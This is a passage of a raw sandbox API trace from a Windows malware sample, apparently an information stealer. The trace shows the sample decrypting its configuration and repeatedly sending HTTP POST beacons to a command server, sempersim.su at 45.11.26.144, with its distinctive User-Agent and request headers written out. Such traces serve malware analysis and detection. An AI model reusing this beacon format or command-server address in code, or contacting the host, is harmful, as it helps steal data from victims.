ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0243.793] GetProcessHeap () returned 0x5b0000 [0243.794] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0243.794] GetProcessHeap () returned 0x5b0000 [0243.794] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0243.794] GetProcessHeap () returned 0x5b0000 [0243.794] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0243.794] GetProcessHeap () returned 0x5b0000 [0243.794] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e88 [0243.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.795] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0243.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.818] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0243.824] GetProcessHeap () returned 0x5b0000 [0243.824] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0243.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.825] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0243.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.826] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0243.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.827] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.827] GetProcessHeap () returned 0x5b0000 [0243.828] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0243.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.830] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e88, pdwDataLen=0xdfcfc | out: pbData=0x5d2e88, pdwDataLen=0xdfcfc) returned 1 [0243.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.831] CryptDestroyKey (hKey=0x5be288) returned 1 [0243.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0243.833] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0243.833] GetProcessHeap () returned 0x5b0000 [0243.833] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0243.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.834] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0243.834] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.835] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0243.835] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.836] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0243.836] GetProcessHeap () returned 0x5b0000 [0243.836] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0243.836] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce100*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0243.838] GetProcessHeap () returned 0x5b0000 [0243.838] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca920 [0243.838] socket (af=2, type=1, protocol=6) returned 0x378 [0243.838] connect (s=0x378, name=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0243.905] FreeAddrInfoW (pAddrInfo=0x5ce100*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0243.906] GetProcessHeap () returned 0x5b0000 [0243.906] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5910 [0243.906] GetProcessHeap () returned 0x5b0000 [0243.907] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0243.907] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0243.908] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0243.908] GetProcessHeap () returned 0x5b0000 [0243.908] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0243.908] GetProcessHeap () returned 0x5b0000 [0243.909] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0243.909] GetProcessHeap () returned 0x5b0000 [0243.909] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2ff0 [0243.909] GetProcessHeap () returned 0x5b0000 [0243.909] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0243.910] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0243.911] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0243.911] GetProcessHeap () returned 0x5b0000 [0243.911] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0243.911] GetProcessHeap () returned 0x5b0000 [0243.912] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0243.912] send (s=0x378, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0243.912] send (s=0x378, buf=0x5d1e18*, len=159, flags=0) returned 159 [0243.912] GetProcessHeap () returned 0x5b0000 [0243.912] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0243.912] recv (in: s=0x378, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0245.193] GetProcessHeap () returned 0x5b0000 [0245.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0245.193] GetProcessHeap () returned 0x5b0000 [0245.194] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0245.194] GetProcessHeap () returned 0x5b0000 [0245.194] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0245.194] GetProcessHeap () returned 0x5b0000 [0245.194] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5910 | out: hHeap=0x5b0000) returned 1 [0245.194] closesocket (s=0x378) returned 0 [0245.195] GetProcessHeap () returned 0x5b0000 [0245.195] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca920 | out: hHeap=0x5b0000) returned 1 [0245.195] GetProcessHeap () returned 0x5b0000 [0245.195] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0245.195] GetProcessHeap () returned 0x5b0000 [0245.196] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0245.196] GetProcessHeap () returned 0x5b0000 [0245.196] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0245.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x868) returned 0x378 [0245.198] Sleep (dwMilliseconds=0xea60) [0245.203] GetProcessHeap () returned 0x5b0000 [0245.203] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0245.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.204] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0245.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.210] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0245.216] GetProcessHeap () returned 0x5b0000 [0245.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0245.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.217] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0245.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.221] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0245.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.221] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.221] GetProcessHeap () returned 0x5b0000 [0245.222] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0245.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.223] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0245.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.223] CryptDestroyKey (hKey=0x5be048) returned 1 [0245.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.224] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0245.224] GetProcessHeap () returned 0x5b0000 [0245.224] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0245.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.225] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.227] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.228] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.228] GetProcessHeap () returned 0x5b0000 [0245.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0245.228] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0245.228] GetProcessHeap () returned 0x5b0000 [0245.228] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0245.229] GetProcessHeap () returned 0x5b0000 [0245.229] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0245.229] GetProcessHeap () returned 0x5b0000 [0245.229] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0245.229] GetProcessHeap () returned 0x5b0000 [0245.229] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0245.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.230] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0245.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.240] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0245.245] GetProcessHeap () returned 0x5b0000 [0245.245] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0245.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.246] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0245.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.247] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0245.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.248] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.248] GetProcessHeap () returned 0x5b0000 [0245.248] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0245.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.251] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0245.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.252] CryptDestroyKey (hKey=0x5bde08) returned 1 [0245.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0245.253] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0245.253] GetProcessHeap () returned 0x5b0000 [0245.253] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0245.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.254] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0245.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.255] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0245.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.256] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0245.256] GetProcessHeap () returned 0x5b0000 [0245.256] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0245.256] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdae8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0245.257] GetProcessHeap () returned 0x5b0000 [0245.257] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0245.257] socket (af=2, type=1, protocol=6) returned 0x37c [0245.258] connect (s=0x37c, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0245.331] FreeAddrInfoW (pAddrInfo=0x5cdae8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0245.331] GetProcessHeap () returned 0x5b0000 [0245.331] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0245.331] GetProcessHeap () returned 0x5b0000 [0245.331] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0245.331] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0245.332] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0245.332] GetProcessHeap () returned 0x5b0000 [0245.332] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0245.332] GetProcessHeap () returned 0x5b0000 [0245.333] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0245.333] GetProcessHeap () returned 0x5b0000 [0245.333] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d34b8 [0245.333] GetProcessHeap () returned 0x5b0000 [0245.333] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0245.334] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0245.335] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0245.335] GetProcessHeap () returned 0x5b0000 [0245.335] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0245.335] GetProcessHeap () returned 0x5b0000 [0245.335] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0245.335] send (s=0x37c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0245.336] send (s=0x37c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0245.336] GetProcessHeap () returned 0x5b0000 [0245.336] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0245.336] recv (in: s=0x37c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0246.601] GetProcessHeap () returned 0x5b0000 [0246.601] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0246.601] GetProcessHeap () returned 0x5b0000 [0246.601] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0246.601] GetProcessHeap () returned 0x5b0000 [0246.602] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0246.602] GetProcessHeap () returned 0x5b0000 [0246.602] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0246.602] closesocket (s=0x37c) returned 0 [0246.603] GetProcessHeap () returned 0x5b0000 [0246.603] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0246.603] GetProcessHeap () returned 0x5b0000 [0246.604] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0246.604] GetProcessHeap () returned 0x5b0000 [0246.604] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3668 | out: hHeap=0x5b0000) returned 1 [0246.604] GetProcessHeap () returned 0x5b0000 [0246.604] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0246.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xb24) returned 0x37c [0246.606] Sleep (dwMilliseconds=0xea60) [0246.609] GetProcessHeap () returned 0x5b0000 [0246.609] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0246.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.610] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0246.617] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.617] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0246.631] GetProcessHeap () returned 0x5b0000 [0246.631] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0246.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.632] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0246.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.633] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0246.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.634] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.634] GetProcessHeap () returned 0x5b0000 [0246.634] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0246.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.635] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0246.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.636] CryptDestroyKey (hKey=0x5be048) returned 1 [0246.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.638] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0246.638] GetProcessHeap () returned 0x5b0000 [0246.638] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0246.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.639] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.645] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.647] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.648] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.648] GetProcessHeap () returned 0x5b0000 [0246.648] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0246.649] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0246.649] GetProcessHeap () returned 0x5b0000 [0246.649] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0246.649] GetProcessHeap () returned 0x5b0000 [0246.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0246.650] GetProcessHeap () returned 0x5b0000 [0246.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0246.650] GetProcessHeap () returned 0x5b0000 [0246.650] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0246.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0246.652] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, 